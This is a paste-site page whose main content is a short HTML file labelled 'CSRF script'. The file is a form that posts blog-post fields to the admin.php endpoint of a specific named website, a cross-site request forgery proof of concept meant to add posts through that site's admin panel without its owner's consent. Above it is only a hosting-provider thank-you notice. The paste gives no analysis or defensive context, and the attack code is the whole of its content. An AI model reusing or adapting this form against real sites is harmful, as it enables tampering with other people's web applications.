Surprise! We've been running on hardware provided by BuyVM for a few months and wanted to show them a little appreciation.
Running a paste site comes with unique challenges, ones that aren't always obvious and hard to control. As such, BuyVM offered us a home where we could worry less about the hosting side of things and focus on maintaining a clean and useful service! Go check them out and show them some love!
Description: CSRF script
Submitted by samvdkris on August 8, 2016

Section 1 (Text)

<!DOCTYPE html>
<html>
<head>
	<title>CSRF</title>
</head>
<body>
	<table>
	<form method="post" autocomplete="off" action="http://pixelcoding.nl/admin/admin.php">
		<tr>
			<td><input type="text" name="addblogpostname" placeholder="Blogpost name"></td>
		</tr>
		<tr>
			<td><textarea name="addblogposttext" placeholder="Blogpost text" rows="10" cols="50"></textarea></td>
		</tr>
		<tr>
			<td><input type="submit" value="Enter"></td>
		</tr>
	</form>
	</table>
</body>
</html>